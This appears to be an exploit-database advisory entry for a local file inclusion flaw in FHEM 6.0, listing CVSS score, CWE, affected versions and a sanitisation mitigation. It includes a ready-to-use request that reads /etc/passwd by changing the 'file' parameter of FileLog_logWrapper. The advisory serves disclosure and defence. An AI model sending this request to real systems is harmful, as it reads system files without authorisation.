vendor:
FHEM
by:
Emre ÖVÜNÇ
7.5
CVSS
HIGH
Local File Inclusion
22
CWE
Product Name: FHEM
Affected Version From: v6.0
Affected Version To: v6.0
Patch Exists: YES
Related CWE: N/A
CPE: a:fhem:fhem:6.0
Metasploit:
N/A
Other Scripts:
N/A
Platforms Tested: Windows
2020
FHEM 6.0 – Local File Inclusion
To exploit vulnerability, someone could use 'http://[HOST]/fhem/FileLog_logWrapper?dev=Logfile&file=%2fetc%2fpasswd&type=text' request to get some informations from the target by changing 'file' parameter.
Mitigation:
Ensure that user input is properly sanitized and validated before being used in file operations.